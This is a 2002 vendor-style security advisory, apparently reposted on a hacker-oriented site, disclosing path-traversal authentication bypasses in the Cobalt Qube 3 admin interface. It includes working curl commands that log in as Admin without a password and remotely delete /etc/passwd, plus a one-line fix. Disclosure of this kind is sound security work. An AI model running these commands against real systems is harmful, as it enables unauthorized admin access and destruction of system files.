NETSYS.COM - The Intelligent Hacker's Choice - http://www.netsys.com/library/cobalt-2002-07-23.txtThe Intelligent Hacker's Choice.. Systems, Networks, Administration.. since 1977 >>>> advertisement SCAN Associates Sdn Bhd Security Advisory Product: Cobalt Qube 3 (Cobalt Linux release 6.0 (Carmel)Kernel 2.2.16C7 on an i586) Date: 23rd July 2002 Summary: By pass login Author: pokleyzz , sk , shaharil Description =========== First of all, we would like to thank you Sun Microsystem (Malaysia) for sponsoring a Cobalt Qube 3 server during the recent HackInTheBox Capture the Flag Security Conference on 16-17 July 2002. Being the winner, we are proud to receive this cool box. After playing around for awhile, we found several problems in Cobalt Qube 3 System Management. The most serious bug may allow remote access as Admin. We have alerted security-alert@sun.com and Sun Microsystem (Malaysia) on 19th July but unfortunately we did not receive any feedback. Details ======= Problem 1: Local Privilege Escalation to Admin Any user with ability to create file in any location of a Cobalt server will be able to promote to Admin access of the System Management. A user may create a file in /tmp/test and crafted a cookie to login as Admin without password: Create dummy session file in Cobalt server: $ printf "admin" > /tmp/test Login without password from anywhere: $ curl -b sessionId=/../../../../../../tmp/test\;loginName=admin http://192.168.0.1:444/splashAdmin.php Problem 2: Remote User access We also found out that if the User account is newly created, we can bypass the authentication without a need to create dummy session file in the server: $curl -b sessionId=../codb/objects/4/.name\;loginName=admin http://192.168.0.1:444/splashAdmin.php Problem 3: Remotely delete file It is possible to delete file from the server by specifying the path to the file and the first 31 characters of the file. The following example will delete the /etc/passwd file from the server: $curl -b sessionId=../../../../../../../../etc/passwd\;loginName=root:x:0:0:root:/root:/bin/bash http://192.168.0.1:444/splashAdmin.php Quick Solution ============== /usr/sausalito/ui/libPhp/ServerScriptHelper.php line 64: $sessionId = ereg_replace("\.\.","",$sessionId); * - curl can be download from http://curl.haxx.se/download.html www.scan-associates.net Copyright © 2003 netsys.com All Rights Reserved.